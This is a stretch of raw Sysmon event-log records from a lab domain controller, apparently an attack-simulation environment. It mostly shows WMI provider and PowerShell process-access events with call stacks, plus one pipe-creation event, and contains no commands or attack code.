16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7BAA-00000000AD01}11996C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7BAA-00000000AD01}11996C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002237078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.387{05ADC7E1-6D64-603E-78AA-00000000AD01}10508\PSHost.132591775722603053.10508.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D64-603E-7BAA-00000000AD01}1199611992C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.387{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 